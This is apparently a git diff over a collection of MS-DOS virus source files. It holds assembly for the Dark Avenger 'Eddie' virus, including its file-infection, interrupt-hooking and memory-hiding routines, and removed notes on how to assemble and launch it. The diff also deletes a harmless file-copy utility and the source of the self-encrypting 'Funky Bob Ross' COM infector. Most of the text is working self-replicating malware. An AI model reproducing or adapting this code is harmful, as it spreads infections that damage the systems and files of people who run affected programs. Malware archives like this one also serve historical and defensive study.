ax,4300h - call function - mov bx,cx - and cl,0feh - cmp cl,bl - je dont_change - mov ax,4301h - call function - stc -dont_change: - pushf - push ds - push dx - push bx - mov ax,3d02h ;Now we can safely open the file - call function - jc cant_open - mov bx,ax - call disease - mov ah,3eh ;Close it - - call function -cant_open: - pop cx - pop dx - pop ds - popf - jnc no_update - mov ax,4301h ;Restores file's attributes - call function ;if they were changed (just in case) -no_update: - xor ax,ax ;Restores INT 13h and INT 24h - mov ds,ax - pop ds:[13h*4] - pop ds:[13h*4+2] - pop ds:[24h*4] - pop ds:[24h*4+2] - pop dx ;Register restoration - pop cx - pop bx - pop ax - pop di - pop si - pop es - pop ds - ret - -; This routine is the working horse. 
- -disease: - push cs - pop ds - push cs - pop es - mov dx,offset top_save ;Read the file beginning - mov cx,18h - mov ah,3fh - int 21h - xor cx,cx - xor dx,dx - mov ax,4202h ;Save file length - int 21h - mov word ptr [top_save+1ah],dx - cmp ax,offset my_size ;This should be top_file - sbb dx,0 - jc stop_fuck_2 ;Small files are not infected - mov word ptr [top_save+18h],ax - cmp word ptr [top_save],5a4dh - jne com_file - mov ax,word ptr [top_save+8] - add ax,word ptr [top_save+16h] - call mul_16 - add ax,word ptr [top_save+14h] - adc dx,0 - mov cx,dx - mov dx,ax - jmp short see_sick -com_file: - cmp byte ptr [top_save],0e9h - jne see_fuck - mov dx,word ptr [top_save+1] - add dx,103h - jc see_fuck - dec dh - xor cx,cx - -; Check if the file is properly infected - - -see_sick: - sub dx,startup-copyright - sbb cx,0 - mov ax,4200h - int 21h - add ax,offset top_file - adc dx,0 - cmp ax,word ptr [top_save+18h] - jne see_fuck - cmp dx,word ptr [top_save+1ah] - jne see_fuck - mov dx,offset top_save+1ch - mov si,dx - mov cx,offset my_size - mov ah,3fh - int 21h - jc see_fuck - cmp cx,ax - jne see_fuck - xor di,di -next_byte: - - lodsb - scasb - jne see_fuck - loop next_byte -stop_fuck_2: - ret -see_fuck: - xor cx,cx ;Seek to the end of file - xor dx,dx - mov ax,4202h - int 21h - cmp word ptr [top_save],5a4dh - je fuck_exe - add ax,offset aux_size+200h ;Watch out for too big .COM files - adc dx,0 - je fuck_it - ret - -; Pad .EXE files to paragraph boundary. This is absolutely unnecessary. - -fuck_exe: - mov dx,word ptr [top_save+18h] - neg dl - and dx,0fh - xor cx,cx - mov ax,4201h - int 21h - mov word ptr [top_save+18h],ax - mov word ptr [top_save+1ah],dx -fuck_it: - mov ax,5700h ;Get file's date - int 21h - pushf - push cx - push dx - cmp word ptr [top_save],5a4dh - je exe_file ;Very clever, isn't it? 
- mov ax,100h - jmp short set_adr -exe_file: - mov ax,word ptr [top_save+14h] - mov dx,word ptr [top_save+16h] -set_adr: - mov di,offset call_adr - stosw - mov ax,dx - stosw - mov ax,word ptr [top_save+10h] - stosw - mov ax,word ptr [top_save+0eh] - stosw - mov si,offset top_save ;This offers the possibilities to - movsb ;some nasty programs to restore - movsw ;exactly the original length - xor dx,dx ;of the .EXE files - mov cx,offset top_file - mov ah,40h - int 21h ;Write the virus - jc go_no_fuck ;(don't trace here) - xor cx,ax - jnz go_no_fuck - mov dx,cx - mov ax,4200h - int 21h - cmp word ptr [top_save],5a4dh - je do_exe - mov byte ptr [top_save],0e9h - mov ax,word ptr [top_save+18h] - add ax,startup-copyright-3 - mov word ptr [top_save+1],ax - mov cx,3 - jmp short write_header -go_no_fuck: - jmp short no_fuck - -; Construct the .EXE file's header - -do_exe: - call mul_hdr - not ax - not dx - inc ax - jne calc_offs - inc dx -calc_offs: - add ax,word ptr [top_save+18h] - adc dx,word ptr [top_save+1ah] - mov cx,10h - div cx - mov word ptr [top_save+14h],startup-copyright - mov word ptr [top_save+16h],ax - add ax,(offset top_file-offset copyright-1)/16+1 - mov word ptr [top_save+0eh],ax - mov word ptr [top_save+10h],100h - add word ptr [top_save+18h],offset top_file - adc word ptr [top_save+1ah],0 - mov ax,word ptr [top_save+18h] - and ax,1ffh - mov word ptr [top_save+2],ax - pushf - mov ax,word ptr [top_save+19h] - shr byte ptr [top_save+1bh],1 - rcr ax,1 - popf - jz update_len - inc ax -update_len: - mov word ptr [top_save+4],ax - mov cx,18h -write_header: - mov dx,offset top_save - mov ah,40h - int 21h ;Write the file beginning -no_fuck: - pop dx - pop cx - popf - jc stop_fuck - mov ax,5701h ;Restore the original file date - int 21h -stop_fuck: - ret - -; The following is used by the INT 21h and INT 27h handlers in connection -; to the program hiding in memory from those who don't need to see it. 
-; The whole system is absurde and meaningless and it is also another source -; for program conflicts. - -alloc: - push ds - call get_chain - mov byte ptr ds:[0],'M' - pop ds - -; Assures that the program is the first one in the processes, -; which have intercepted INT 21h (yet another source of conflicts). - -ontop: - push ds - push ax - push bx - push dx - xor bx,bx - mov ds,bx - lds dx,ds:[21h*4] - cmp dx,offset int_21 - jne search_segment - mov ax,ds - mov bx,cs - cmp ax,bx - je test_complete - -; Searches the segment of the sucker who has intercepted INT 21h, in -; order to find where it has stored the old values and to replace them. -; Nothing is done for INT 27h. - - xor bx,bx -search_segment: - mov ax,[bx] - cmp ax,offset int_21 - jne search_next - mov ax,cs - cmp ax,[bx+2] - je got_him -search_next: - inc bx - jne search_segment - je return_control -got_him: - mov ax,word ptr cs:[save_int_21] - mov [bx],ax - mov ax,word ptr cs:[save_int_21+2] - mov [bx+2],ax - mov word ptr cs:[save_int_21],dx - mov word ptr cs:[save_int_21+2],ds - xor bx,bx - -; Even if he has not saved them in the same segment, this won't help him. - -return_control: - mov ds,bx - mov ds:[21h*4],offset int_21 - mov ds:[21h*4+2],cs -test_complete: - pop dx - pop bx - pop ax - pop ds - ret - -; Fetch the segment of the last MCB - -get_chain: - push ax - push bx - mov ah,62h - call function - mov ax,cs - dec ax - dec bx -next_blk: - mov ds,bx - stc - adc bx,ds:[3] - cmp bx,ax - jc next_blk - pop bx - pop ax - ret - -; Multiply by 16 - -mul_hdr: - mov ax,word ptr [top_save+8] -mul_16: - mov dx,10h - mul dx - ret - - db 'This program was written in the city of Sofia ' - db '(C) 1988-89 Dark Avenger',0 - -; INT 13h handler. 
-; Calls the original vectors in BIOS, if it's a writing call - -int_13: - cmp ah,3 - jnz subfn_ok - cmp dl,80h - jnc hdisk - db 0eah ;JMP XXXX:YYYY -my_size: ;--- Up to here comparison -disk: ; with the original is made - dd 0 -hdisk: - db 0eah ;JMP XXXX:YYYY -fdisk: - dd 0 -subfn_ok: - db 0eah ;JMP XXXX:YYYY -save_int_13: - dd 0 -call_adr: - dd 100h - -stack_pointer: - dd 0 ;The original value of SS:SP -my_save: - int 20h ;The original contents of the first - nop ;3 bytes of the file -top_file: ;--- Up to here the code is written -filehndl equ $ ; in the files -filename equ filehndl+2 ;Buffer for the name of the opened file -save_int_27 equ filename+65 ;Original INT 27h vector -save_int_21 equ save_int_27+4 ;Original INT 21h vector -aux_size equ save_int_21+4 ;--- Up to here is moved into memory -top_save equ save_int_21+4 ;Beginning of the buffer, which -contains - ; - The first 24 bytes read from file - ; - File length (4 bytes) - ; - The last bytes of the file - ; (my_size bytes) -top_bz equ top_save-copyright -my_bz equ my_size-copyright - -code ends - end diff --git a/a/Avengsrc.asm b/a/Avengsrc.asm index d0e0318..0fdbc0f 100755 --- a/a/Avengsrc.asm +++ b/a/Avengsrc.asm 
@@ -1,23 +1,3 @@
-
-
-
-
-
-
-OK, Rob - here ya' go. As I understand it, this is only one revision level
-lower than the "current" version of the virus -- but I have no idea what the
-differences are between the two. Sigh. TASM can be used to assemble the
-code, then you can replace (using DEBUG) the first 3 bytes of the linked
-.COM file to 9H 65 00 to jump to the start of the virus code. I have been
-unable to cause the resulting executable to infect file on floppy until the
-virus is run on a hard drive first. So, to begin infections (after
-assembling/linking/editing the executable): 1) Run the modified executable,
-2) Run a program on your hard drive. From there it will spread to files on
-the hard drive and the floppy. FluShot+ makes a good monitor for watching
-this virus at work. Have fun!
-
-Thanks for your help, and thanks for a great weekend.
-
 ;************************
 ;* *
 ;* E D D I E *
diff --git a/b/BAC (24).ASM b/b/BAC (24).ASM
deleted file mode 100755
index b7e8a12..0000000
--- a/b/BAC (24).ASM
+++ /dev/null
@@ -1,364 +0,0 @@ -BAC segment para public 'code' - assume cs:BAC, ds:BAC, es:BAC, ss:NOTHING - org 100h ; .COM format -BEGIN: - jmp CODE_START ; Jump around data declarations -DECLARE: ; Messages, Storage Areas, Equates - COPYRIGHT db 'BACopy (C) 1985, Dickinson Associates Inc.' - db 13,10,'$' - PATH_FILE_LEN equ 77 ;Length = 1, Path = 63, FileName = 12, 0 = 1 - SOURCE_FILE db PATH_FILE_LEN dup (0) - TARGET_PATH db PATH_FILE_LEN dup (0) - SOURCE_END dw 0 - TARGET_END dw 0 - SOURCE_HANDLE dw 0 - TARGET_HANDLE dw 0 - SOURCE_DTA db 44 dup(0) - TARGET_DTA db 44 dup(0) - VALID_IN db 'abcdefghijklmnopqrstuvwxyz,;=',9 - VALID_OUT db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',4 dup(32) - VALID_NUM equ $ - VALID_OUT + 1 - BLKSIZE dw 0 - LAST_BLOCK db 0 - EVENT_FLAG db 0 - ERR_HEAD db 10,13,'BACopy Error - $' - NO_PARMS db 'Correct Syntax is:',13,10,10 - db 'BACopy [d:][source_path]source_filename[.ext] [d:][target_path]$' - FILE_NOT_FOUND db 'File Not Found$' - SOURCE_ERROR db 'Opening Source File$' - CREATE_ERROR db 'Creating Target File$' - TARGET_FULL db '!!',10,10,13,'Target Disk is Full',13,10,10 - db 'Insert New Disk and Press [Enter]',7,'$' - ERR_TAIL db 10,10,13,' . . . Aborting',10,13,13,'$' - CONFIRM_MSG_1 db ' . . $' - CONFIRM_MSG_2 db 'BACopied to . . 
$' - END_LINE db 10,13,'$' - NOTHING_TO_DO db 13,10,'No Files Needed to be BACopied',13,10,'$' -; -CODE_START: ; Parse command line into source & target parameters - mov dx,offset COPYRIGHT ; Display copyright notice - mov ah,9h - int 21h - mov si,80h ; PSP parameter byte count pointer - mov cl,[si] ; Move byte count to CL - xor ch,ch ; Zero CH - jcxz NO_PARMS_PASSED ; If CX is zero, there are no parameters - mov dx,cx ; Save byte count in dx - inc si ; Point to parameter area - mov di,si ; Copy SI to DI for cleanup routine - cld ; Set direction flag to forward -CLEAN_PARMS: ; Change valid delimiters to blanks, lower to upper case - lodsb ; Load each character to AL - push di ; Save DI on stack - mov di,offset VALID_IN ; Point to table of valid inputs - push cx ; Save CX on stack - mov cx,VALID_NUM ; Set CX to number of inputs to look for -repne scasb ; See if any are in AL - jcxz CLEAN_END ; If not, change nothing - mov bx,VALID_NUM ; Set up BX to point to valid output - sub bx,cx ; This will leave BX one off - mov al,VALID_OUT [bx - 1] ; Load the valid output to AL -CLEAN_END: - pop cx ; Restore CX - pop di ; Restore DI - stosb ; Store modified AL back to PSP -loop CLEAN_PARMS ; Loop until CX is zero -; - mov cx,dx ; Restore number of bytes in PSP to CX - mov dx,2 ; Set DX to look for up to 2 parameters - mov bx,offset SOURCE_FILE ; Set BX to address of 1st parameter - mov al,' ' ; Set up to scan for first non-blank - mov di,81h ; Set DI to PC-DOS parameter pointer -FIND_PARMS: ; Start looking for parameters, load to program storage -repe scasb ; Scan while blanks - mov si,di ; Set SI to second non-blank byte - dec si ; Adjust it to first non-blank byte - inc cx ; Adjust CX to compensate - jcxz PARMS_LOADED ; If CX is zero, no parameters left - mov di,bx ; Set DI to parameter hold area - mov ax,cx ; Store CX to first byte of hold area - stosb ; DI is adjusted to second byte here -STORE: lodsb ; Load each byte to AL - cmp al,' ' ; Is it a blank? 
- jz END_STORE ; Yes, end of this parameter - stosb ; No, store the byte to hold area -END_STORE: - loopnz STORE ; Keep looking - sub [bx],cx ; Store number of bytes in each - jcxz PARMS_LOADED ; If CX is zero, no more parameters - dec byte ptr [bx] ; parameter to first byte of hold area - mov di,si ; Set up to scan for next non-blank - dec di ; Adjust DI to point to the blank - inc cx ; Adjust CX to compensate - dec dx ; Decrement DX counter - cmp dx,0 ; Is DX zero? - jz PARMS_LOADED ; Yes, all expected parameters loaded - add bx,PATH_FILE_LEN ; No, point to next part of hold area - jmp FIND_PARMS ; Go back and look for more -PARMS_LOADED: ; All parameters are loaded - cmp SOURCE_FILE[0],0 ; If there are no bytes in the - ja FIX_UP ; SOURCE_FILE, no parameters present -NO_PARMS_PASSED: ; Exit with an error if there - mov dx,offset NO_PARMS ; are no parameters passed - jmp ERROR_EXIT -FIX_UP: ; Fix SOURCE_FILE and TARGET_PATH - mov si,offset SOURCE_FILE ; For Search calls - lodsb ; Get Number of bytes - xor ah,ah ; Zero high byte of AX - mov di,si ; Move SI to DI for scan - add di,ax ; Start scan at end of parameter - dec di ; Adjust DI - mov cx,ax ; Set CX to number of bytes - mov al,'\' ; Scan for the last '\' - std ; Set direction flag to reverse -repnz scasb ; Scan while not '\' - jnz NO_SOURCE_DIR ; If Zero Flag not set, '\' not found - add di,2 ; Add 2 to DI to point to file name - jmp SOURCE_FIXED ; position -NO_SOURCE_DIR: ; No source directory was specified - add di,1 ; Adjust DI - cmp SOURCE_FILE[2],':' ; Check for specified disk drive - jne SOURCE_FIXED ; None present, we're done - mov di,offset SOURCE_FILE[3]; Yes, set DI to point to first byte -SOURCE_FIXED: ; after ':' - mov SOURCE_END,di ; Move DI to SOURCE_END pointer -; - cld ; Set direction flag to forward - mov si,offset TARGET_PATH ; Set up to look for '\' present - lodsb ; Get number of bytes - cmp al,0 ; If it's zero, no target specified - je NO_TARGET - xor ah,ah ; Zero high byte of AX - add 
si,ax ; Add it to SI to point to end - dec si ; Decrement SI to adjust - lodsb ; Look at last byte - mov di,si ; Copy SI to DI - cmp al,'\' ; Is last byte a '\'? - je TARGET_FIXED ; Yes, everything's fine - cmp TARGET_PATH[0],2 ; If TARGET_PATH is 2 bytes long and - jne STORE_SLASH ; is a disk drive specification, - cmp TARGET_PATH[2],':' ; let it default to the current - je TARGET_FIXED ; directory. -STORE_SLASH: ; Place a '\' at the end of - mov al,'\' ; TARGET_PATH if user did - stosb ; not -TARGET_FIXED: - mov TARGET_END,di ; Move DI to TARGET_END pointer - jmp BUFFER_SIZE -NO_TARGET: ; Set up to allow target path default - mov TARGET_END,offset TARGET_PATH + 1 ; to current path -BUFFER_SIZE: ; Compute size of file buffer - mov ax,0fdffh ; Leave plenty of room in segment - mov dx,offset FILE_BUFFER ; for stack & set DX to end of code - sub ax,dx ; Subtract - mov BLKSIZE,ax ; Save result in BLKSIZE -FIND_FILE: ; Find first source file - xor ax,ax ; Request to use SOURCE_DTA - mov ah,1ah ; to house FCB for SOURCE_FILE - mov dx,offset SOURCE_DTA - int 21h ; Call PC-DOS - mov dx,offset SOURCE_FILE + 1 ; DX points to SOURCE_FILE - mov ah,4eh ; Request function 4EH (find 1st file) - mov cx,0 ; Set CX to zero for normal files only - int 21h ; Call PC-DOS - jnc FOUND_FILE ; If no error, first file found - mov dx,offset FILE_NOT_FOUND; If no files found, exit - jmp ERROR_EXIT ; program with error message -FOUND_FILE: - mov LAST_BLOCK,0 ; Initalize last block read flag - mov si,offset SOURCE_DTA+30 ; SI points to source file name in DTA - mov di,SOURCE_END ; DI points to end of source path - push si ; Save pointer to source file name - mov cx,13 ; DTA will have 13 bytes -rep movsb ; Move name bytes to SOURCE_FILE - mov di,TARGET_END ; DI points to end of target path - pop si ; Recover pointer to source file name - mov cx,13 ; DTA will have 13 bytes -rep movsb ; Move file name bytes to TARGET_PATH -FIND_TARGET: ; Find matching target file - mov ah,1ah ; Request to use 
TARGET_DTA - xor al,al ; to house FCB for TARGET_PATH - mov dx,offset TARGET_DTA - int 21h ; Call PC-DOS - mov ah,4eh ; Request find 1st file for target - mov dx,offset TARGET_PATH+1 - mov cx,0 ; Set CX to zero for normal files only - int 21h ; Call PC-DOS - jc OPEN_SOURCE ; If not found, bypass date & time check -CHECK_TIME_DATE: ; Check time & date stamps in DTAs - mov si,offset SOURCE_DTA+24 ; Load source file date stamp to AX - lodsw - mov dx,ax ; Save in DX - mov si,offset TARGET_DTA+24 ; Load target file date stamp to AX - lodsw - cmp dx,ax ; If Source file newer, jump - ja OPEN_SOURCE ; to OPEN_SOURCE - jne DONT_COPY ; If Source file older, don't copy it - mov si,offset SOURCE_DTA+22 ; Otherwise, - lodsw ; load source time stamp to AX - mov dx,ax ; Save in DX - mov si,offset TARGET_DTA+22 ; Load target time stamp to AX - lodsw - cmp dx,ax ; If Source file newer, jump - ja OPEN_SOURCE ; to OPEN_SOURCE - jmp DONT_COPY -DONT_COPY: ; Otherwise, - call CLOSE_ALL ; Close all files - jmp NEXT_FILE ; Check for next file -OPEN_SOURCE: - mov ah,3dh ; Request Open Source File - mov dx,offset SOURCE_FILE+1 ; DX points to source file path name - mov al,0 ; with read permission only - int 21h ; Call PC-DOS - mov SOURCE_HANDLE,ax ; Save handle in memory - jnc CREATE_TARGET ; If no carry, open was good - mov dx,offset SOURCE_ERROR ; Otherwise, exit with error - mov SOURCE_HANDLE,0 ; Make sure CLOSE_ALL ignores handle - jmp ERROR_EXIT -CREATE_TARGET: - xor ax,ax - mov ah,3ch ; Request create & open a file - mov dx,offset TARGET_PATH+1 ; named the target file - xor cx,cx ; with normal attribute - int 21h ; Call PC-DOS - mov TARGET_HANDLE,ax ; Save target handle - jnc PROCEED_TO_COPY ; If no carry, create / open is ok - mov dx,offset CREATE_ERROR ; Otherwise, exit with an error - mov TARGET_HANDLE,0 ; Make sure CLOSE_ALL ignores target - jmp ERROR_EXIT -PROCEED_TO_COPY: ; The heart of the matter - mov si,offset SOURCE_FILE+1 ; Point to source file -START1: lodsb ; Load each 
byte to AL - cmp al,0 ; If ASCII 0, end of field - je DOTS - mov dl,al ; Copy byte to DL for funciton 2H - mov ah,2h ; Request function 2H - int 21h ; Call PC-DOS - jmp START1 ; Get next character -DOTS: mov ah,9h ; Confirm start of task - mov dx,offset CONFIRM_MSG_1 - int 21h -KEEP_COPYING: - mov ah,3fh ; Request read block of data - mov cx,BLKSIZE ; BLKSIZE bytes long - mov bx,SOURCE_HANDLE ; from source file - mov dx,offset FILE_BUFFER ; into buffer - int 21h ; Call PC-DOS - cmp ax,0 ; If AX is 0, no bytes were - je FINISH ; read, and we're done - mov cx,ax ; Move AX to CX for write call (below) - cmp cx,BLKSIZE ; Check number of bytes read against - je MORE_TO_COME ; request. If equal, we got them all, - mov LAST_BLOCK,1 ; otherwise, it's the last block of file -MORE_TO_COME: ; - push cx ; Save requested write count on stack - mov ah,40h ; Request write block of data - mov bx,TARGET_HANDLE ; to target file - mov dx,offset FILE_BUFFER ; from file buffer - int 21h ; Call PC-DOS - pop cx ; Recover requested write count - cmp ax,cx ; If CX equals AX, - je WRITE_OK ; write was successful, -DISK_FULL: - call CLOSE_ALL ; Otherwise disk is full -- close files - mov ah,41h ; Request erase file - mov dx,offset TARGET_PATH+1 ; for incomplete target. - int 21h ; Call PC-DOS - mov dx,offset TARGET_FULL - mov ah,9h - int 21h -READ_KEYBOARD: ; Prompt requested [Enter] key - mov ah,8h ; Make sure [Ctrl]-[Break] is detected - int 21h ; Call PC-DOS for key - cmp al,13 ; Check for [Enter] - jne READ_KEYBOARD ; (no extended codes are 13) - mov cx,2 -END_FULL: - mov dx,offset END_LINE ; Send a new line to screen - mov ah,9h - int 21h - loop END_FULL - jmp FOUND_FILE ; Re-start from FOUND_FILE: -WRITE_OK: - cmp LAST_BLOCK,1 ; If this is the last block, - je FINISH ; we're done - jmp KEEP_COPYING ; Otherwise, keep going. 
-FINISH: ; Force target time & date stamps - mov ah,57h ; to equal source, close files - mov al,0 ; Request get time and date stamos - mov bx,SOURCE_HANDLE ; for source file - int 21h ; DX & CX contain data - mov ah,57h ; Request set date and time - mov al,1 ; to force target file to - mov bx,TARGET_HANDLE ; source stamp - int 21h ; Call PC-DOS - call CLOSE_ALL ; Go close all files - mov dx,offset CONFIRM_MSG_2 ; Confirm completion of task - mov ah,9h ; Request function 9H - int 21h ; Call PC-DOS - mov si,offset TARGET_PATH+1 ; Point to source file -START2: lodsb ; Load each byte to AL - cmp al,0 ; If ASCII 0, end of field - je CR_LF - mov dl,al ; Copy byte to DL for funciton 2H - mov ah,2h ; Request function 2H - int 21h ; Call PC-DOS - jmp START2 ; Get next character -CR_LF: mov dx,offset END_LINE ; Terminate display line - mov ah,9h ; Request function 9H - int 21h - mov EVENT_FLAG,1 ; Set flag to indicate file was copied -NEXT_FILE: ; Go Look for next file - xor ax,ax - mov ah,1ah ; Request to use SOURCE_DTA - mov dx,offset SOURCE_DTA ; to house FCB for SOURCE_FILE - int 21h ; Call PC-DOS - mov ah,4fh ; Request find next source file - mov cx,0 ; Normal files only - int 21h ; Call PC-DOS - jnc FOUND_ANOTHER ; No error, another file was found - jmp END_OK ; Error, we're done finding files -FOUND_ANOTHER: - jmp FOUND_FILE ; Go process next file -END_OK: cmp EVENT_FLAG,1 ; Did anything happen? 
- je EXIT ; Yes, just exit - mov dx,offset NOTHING_TO_DO ; No, tell user that nothing happened - mov ah,9h - int 21h -EXIT: int 20h ; Exit to PC-DOS -ERROR_EXIT: ; Print Error Message and Exit - push dx ; Save error message pointer on stack - mov ah,9 ; Display error header - mov dx,offset ERR_HEAD - int 21h - mov ah,9 ; Display error message - pop dx - int 21h - mov ah,9 ; Display error tail - mov dx,offset ERR_TAIL - call CLOSE_ALL - int 21h - int 20h ; Exit to PC-DOS - - -CLOSE_ALL proc - cmp SOURCE_HANDLE,0 ; Check for valid SOURCE_HANDLE - je CLOSE_TARGET ; None, then go close target - mov ah,3eh ; Request close file - mov bx,SOURCE_HANDLE ; for source handle - int 21h ; Call PC-DOS - mov SOURCE_HANDLE,0 ; Refresh handle -CLOSE_TARGET: - cmp TARGET_HANDLE,0 ; Check for valid TARGET_HANDLE - je CLOSE_RETURN ; None, then return - mov bx,TARGET_HANDLE ; Request close file - mov ah,3eh ; for target handle - int 21h ; Call PC-DOS - mov TARGET_HANDLE,0 ; Refresh handle -CLOSE_RETURN: - ret -CLOSE_ALL endp -FILE_BUFFER label word -BAC ends - end BEGIN - \ No newline at end of file diff --git a/b/BOBVIRUS (26).ASM b/b/BOBVIRUS (26).ASM deleted file mode 100755 index 21bbebc..0000000 --- a/b/BOBVIRUS (26).ASM +++ /dev/null 
@@ -1,565 +0,0 @@ -; The Funky Bob Ross Virus Version 1.0 -; Written by Dark Angel / 26 September 1991 / (c) 1991 -; PHALCON/SKISM Co-op -; Effective length: 1125, Resident length: 672 bytes -; -; DEDICATION: -; This virus was written expressedly to -; 1) Piss off Patty Hoffman, John McAffee, Ross Greenberg, and all the -; other guru-wanna-bes in this world. -; 2) Spread the message of The Almighty Bob, and so enrichen the lives -; of people all over the world. -; 3) Show off (Now I can tell people that I wrote a virus!) -; -; WHAT THIS IS: -; This is a self-encrypting, non-overwriting COM infector. It doesn't do -; anything to EXE files. File sizes increase by 1117 bytes. It goes off -; on July 9th of any year or after 7 infection "waves." -; -; WHAT IT DOES WHEN IT GOES OFF: -; The virus goes memory resident and prints out a Bobism every 5 minutes. -; It then enters a delay loop for approximately 5 seconds, allowing for a -; brief moment of silence while the victim reads Bob's holy message. The -; virus will not destroy anything. The virus will not go TSR if it finds -; another copy of itself in memory. -; -; CAUTION: THIS IS DESTRUCTIVE CODE. YOU SHOULD NOT EVEN BE LOOKING AT IT. -; I HAVE NEVER AND WILL NEVER RELEASE THIS CODE. IF YOU SHOULD BE -; LOOKING AT IT, IT IS BECAUSE IT WAS STOLEN FROM ME. YOU HAVE NO -; RIGHT TO LOOK AT THIS CODE. IF THIS SOURCE SHOULD FALL INTO THE -; WRONG HANDS, IT COULD BE VERY BAD! DESTROY THIS IMMEDIATELY. I -; HOLD NO RESPONSIBILITY FOR WHAT STUPID PEOPLE DO WITH THIS CODE. -; THIS WAS WRITTEN FOR EDUCATIONAL PURPOSES ONLY!!! 
- -CODE SEGMENT PUBLIC 'CODE' - ORG 100h - ASSUME CS:CODE,DS:CODE,SS:CODE,ES:CODE - -DTA_fileattr EQU 21 -DTA_filetime EQU 22 -DTA_filedate EQU 24 -DTA_filesize EQU 26 -DTA_filename EQU 30 - -virus_marker equ 026FFh ; JMP WORD PTR -virus_marker2 equ 00104h ; 0104h -part1_size equ part1_end - part1_start -part2_size equ part2_end - part2_start -offset_off equ duh2 -init_delay equ 5280 ; Initial delay -delay equ 400 ; Subsequent delay -num_Messages equ 7 ; Number of Bob messages -waves equ 7 ; Number of waves to go off after -infec_date equ 0709h ; Date of psychosis - -Counter equ 108h -D_Mess equ 110h -Int_08_Start equ 112h - -part1_start: - jmp word ptr duh -duh dw middle_part_end - part1_start + 100h -duh2 dw 0 -part1_end: - -middle_part_start: -middle_part_end: - -;============================================================================= -;Part 2 begins: Dis is the D-Cool part -;============================================================================= -part2_start: - cld - call decrypt - mov si, offset Go - add si, offset_off - jmp si - -encrypt_val db 00h - -decrypt: -encrypt: - mov si, offset encrypt_val - add si, offset_off - mov ah, byte ptr [si] - - mov cx, offset part2_end - offset bam_bam - add si, offset bam_bam - offset encrypt_val - mov di, si - -xor_loop: - lodsb ; DS:[SI] -> AL - xor al, ah - stosb - loop xor_loop - ret - -copy_rest_stuff: -; Mah copying routine - push si ; SI -> buffer3 - call encrypt - mov cx, part2_size - pop dx - add dx, offset part2_start - offset buffer3 - mov ah, 40h - int 21h - call decrypt -bam_bam: - ret - -buffer db 0CDh, 20h, 0, 0, 0, 0, 0, 0 -buffer2 db part1_end - part1_start dup (?) -buffer3 dw ? -orig_path db 64 dup (?) 
-num_infec db 0 ; Infection wave number -infec_now db 0 ; Number files infected this time -root_dir db '\',0 -com_mask db '*.com',0 -dir_mask db '*.*',0 -back_dir db '..',0 -nest dw 0 - -DTA db 43 DUP (0) ; For use by infect_dir - -Go: - add si, offset buffer - offset Go - mov di, si - add di, offset buffer2 - offset buffer - mov cx, part1_size - rep movsb - - mov ah, 47h ; Get directory - xor dl,dl ; Default drive - add si, offset orig_path - offset buffer - 8 ; DS:[SI] -> buffer - int 21h ; in orig_path - jc Go_Error - - mov ah, 3Bh ; Change directory - mov dx, si ; to the root dir - add dx, offset root_dir - offset orig_path - int 21h - jc Go_Error - - add si, offset num_infec - offset orig_path - inc byte ptr [si] ; New infection wave - - push si ; Save offset num_infec - - add si, offset infec_now - offset num_infec - mov byte ptr [si], 3 ; Reset infection - ; counter to 3 - ; for D-new run. - - call traverse_fcn ; Do all the work - - pop si ; Restore offset num_infec - cmp byte ptr [si], waves ; 10 infection waves? - jge Go_Psycho ; If so, activate - - mov ah, 2Ah ; Get date - int 21h - cmp dx, infec_date ; Is it 07/09? - jz Go_Psycho ; If so, activate -Go_Error: - jmp quit ; And then quit - -Go_Psycho: - jmp Psycho - -origattr db 0 -origtime dw 0 -origdate dw 0 -filesize dw 0 ; Size of the uninfected file - -oldhandle dw 0 - -;============================================================================= -;D-Traversal function begins -;============================================================================= -traverse_fcn proc near - push bp ; Create stack frame - mov bp,sp - sub sp,44 ; Allocate space for DTA - push si - - jmp infect_directory -In_fcn: - mov ah,1Ah ;Set DTA - lea dx,word ptr [bp-44] ; to space allotted - int 21h ;Do it now, do it hard! - - mov ah, 4Eh ;Find first - mov cx,16 ;Directory mask - mov dx,offset dir_mask ; *.* - add dx,offset_off - int 21h - jmp short isdirok -gonow: - cmp byte ptr [bp-14], '.' ;Is first char == '.'? 
- je short donext ; If so, loop again - lea dx,word ptr [bp-14] ;else load dirname - mov ah,3Bh ; and changedir there - int 21h ;Yup, yup - jc short donext ; Do next if invalid - mov si, offset nest ; Else increment nest - add si, offset_off - inc word ptr [si] ; nest++ - call near ptr traverse_fcn ; recurse directory -donext: - lea dx,word ptr [bp-44] ;Load space allocated for DTA address - mov ah,1Ah ; and set DTA to it - int 21h ; 'cause it might have changed - - mov ah,4Fh ;Find next - int 21h -isdirok: - jnc gonow ;If OK, jmp elsewhere - mov si, offset nest - add si, offset_off - cmp word ptr [si], 0 ;If root directory (nest == 0) - jle short cleanup ; Quit - dec word ptr [si] ;Else decrement nest - mov dx,offset back_dir ;'..' - add dx, offset_off - mov ah,3Bh ;Change directory - int 21h ; to previous one -cleanup: - pop si - mov sp,bp - pop bp - ret -traverse_fcn endp -;============================================================================= -;D-Traversal function ends -;============================================================================= - -Goto_Error: - jmp Error - -enuff_for_now: - ;Set nest to nil - mov si, offset nest ; in order to - add si, offset_off ; halt the D-Cool - mov word ptr [si], 0 ; traversal fcn - jmp short cleanup -return_to_fcn: - jmp short In_fcn ;Return to traversal function - -infect_directory: - mov ah, 1Ah ;Set DTA - mov dx, offset DTA ; to DTA struct - add dx, offset_off - int 21h - -find_first_COM: - mov ah, 04Eh ; Find first file - mov cx, 0007h ; Any file - mov dx, offset com_mask ; DS:[DX] --> filemask - add dx, offset_off - int 21h ; Fill DTA (hopefully) - jc return_to_fcn ; Error #E421:0.1 - jmp check_if_COM_infected ; I<___-Cool! Found one! - -find_next_file2: - mov si, offset infec_now ; Another loop, - add si, offset_off ; Another infection - dec byte ptr [si] ; Infected three? 
